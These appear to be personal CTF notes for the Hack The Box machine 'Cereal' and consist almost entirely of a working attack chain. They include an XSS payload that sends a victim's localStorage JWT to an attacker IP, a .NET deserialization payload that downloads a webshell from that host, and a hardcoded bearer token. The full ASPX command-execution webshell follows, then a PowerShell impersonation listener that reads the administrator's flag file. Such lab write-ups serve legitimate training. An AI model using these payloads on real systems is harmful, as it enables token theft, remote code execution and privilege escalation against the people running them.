xct's notes
Cereal
Notes for https://youtu.be/tjaW1KC7lBI

GitTools

Auth Fiddle

Steal JWT from Local Storage via XSS

{
"RequestID":1000,
"json":"{\"title\":\"[y](javascript: (function () {window.location.href=\\\"http://10.10.14.91:8000/x\\\"+localStorage.getItem('currentUser');})(););\",\"flavor\":\"x)\",\"color\":\"x\",\"description\":\"x\"}"
}

Deserialization Fiddle

Store Deserialization Payload

{
"RequestId":1001,
"JSON":"{\"$type\":\"Cereal.DownloadHelper, cereal, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null\",\"URL\":\"http://10.10.14.91/cmd.aspx\",\"FilePath\":\"c:\\\\inetpub\\\\source\\\\uploads\\\\xct.aspx\"}"
}

Trigger Deserialization Payload via XSS

{
"json":"{\"title\":\"[xhr](javascript:(function () {var x1=new XMLHttpRequest();x1.open('GET','https://cereal.htb/requests/1001');x1.setRequestHeader('Authorization','Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEiLCJuYmYiOjE2MDYwNTcxMTksImV4cCI6MTkyMTU4OTkxOSwiaWF0IjoxNjA2MDU3MTE5fQ.o9NIIeA9lnbaIopr3y1BlVh46l10OdOIfBX7wyspoBY');x1.withCredentials=true;x1.send();var x2=new XMLHttpRequest();x2.open('GET','https://10.10.14.91:8000/proof');x2.setRequestHeader('Authorization','Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1bmlxdWVfbmFtZSI6IjEiLCJuYmYiOjE2MDYwNTcxMTksImV4cCI6MTkyMTU4OTkxOSwiaWF0IjoxNjA2MDU3MTE5fQ.o9NIIeA9lnbaIopr3y1BlVh46l10OdOIfBX7wyspoBY');x2.withCredentials=true;x2.send();})();)\",\"flavor\":\"x)\",\"color\":\"x\",\"description\":\"x\"}"
}

ASPX Shell

<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
// Page lifecycle hook; intentionally empty. All work happens in cmdExe_Click,
// which the form's button below wires up through its OnClick attribute.
void Page_Load(object sender, EventArgs e)
{
}
// Runs "cmd.exe /c <arg>" and returns whatever the child wrote to stdout.
// arg comes straight from the form field: no validation, no quoting.
// Only stdout is redirected (RedirectStandardOutput); stderr is not, so a
// failing command simply yields an empty or partial string.
// No UserName/credentials are set on the ProcessStartInfo, so the child runs
// under the identity of the process hosting this page (the web server's
// worker process — presumably, given this is an ASPX page; confirm).
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
// Redirecting a standard stream requires UseShellExecute = false.
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
// Blocks until the child closes its stdout, so a long-running command keeps
// the HTTP request open for that long.
string s = stmrdr.ReadToEnd();
stmrdr.Close();
// p is neither waited on (WaitForExit) nor disposed.
return s;
}
// Click handler for the "excute" button: runs the text from txtArg through
// ExcuteCmd and echoes the result inside a <pre>. Server.HtmlEncode makes the
// command output render as text rather than being interpreted as markup.
// Identifying strings of this listing, useful when hunting for copies of it:
// the page title "awen asp.net webshell", the misspelled "excute"/"ExcuteCmd"
// names, and the attribution comments at the end of the file.
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
<!-- Contributed by Dominic Chell (http://digitalapocalypse.blogspot.com/) -->
<!-- http://michaeldaw.org 04/2007 -->

Impersonation PowerShell Webserver

# Minimal HttpListener that authenticates the caller with Integrated Windows
# Authentication and then services the request under that caller's identity.
# LoadWithPartialName is deprecated, and nothing below visibly uses System.Web;
# presumably a leftover — TODO confirm.
[System.Reflection.Assembly]::LoadWithPartialName("System.Web")
$listener = New-Object System.Net.HttpListener
# Bound to loopback only: a client has to reach port 7000 from the same host.
$listener.Prefixes.Add("http://localhost:7000/")
# Windows auth is required so that $context.User carries the client's identity.
$listener.AuthenticationSchemes = [System.Net.AuthenticationSchemes]::IntegratedWindowsAuthentication
$listener.Start()

do {
Write-Host "Listening..."
# Blocks until a request arrives.
$context = $listener.GetContext()
$requestUrl = $context.Request.Url   # assigned but not used below
$response = $context.Response
# Switches this thread to the authenticated client's token. The returned
# WindowsImpersonationContext is discarded, so impersonation is never reverted
# with Undo() between requests. Whether the process may impersonate the
# client's token at all depends on its privileges
# (NOTE(review): presumably SeImpersonatePrivilege — confirm).
$context.User.Identity.Impersonate()

$Content = ""
try{
# run any command as admin here
# NOTE: this command's output is written to the script's own pipeline/console,
# not assigned to $Content; on the success path $Content stays "".
type C:\users\administrator\desktop\root.txt
} catch [System.UnauthorizedAccessException] {
# The impersonated identity was denied access to the path.
$response.StatusCode = 401
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
} catch [System.Management.Automation.ItemNotFoundException] {
# The path does not exist.
$response.StatusCode = 404
$Content = [System.Text.Encoding]::UTF8.GetBytes("")
} catch {
# Any other error: echo the error record to the console and return the
# details in the response body.
$_
$Content = "$($_.InvocationInfo.MyCommand.Name) : $($_.Exception.Message)"
$Content += "$($_.InvocationInfo.PositionMessage)"
$Content += " + $($_.CategoryInfo.GetMessage())"
$Content += " + $($_.FullyQualifiedErrorId)"
$Content = [System.Text.Encoding]::UTF8.GetBytes($Content)
$response.StatusCode = 500
}
# On the success path $Content is still the empty string rather than a byte[].
$response.ContentLength64 = $Content.Length
$response.OutputStream.Write($Content, 0, $Content.Length)
$response.Close()
# One request per second at most; the loop is single-threaded.
Start-Sleep -Seconds 1
} while ($listener.IsListening)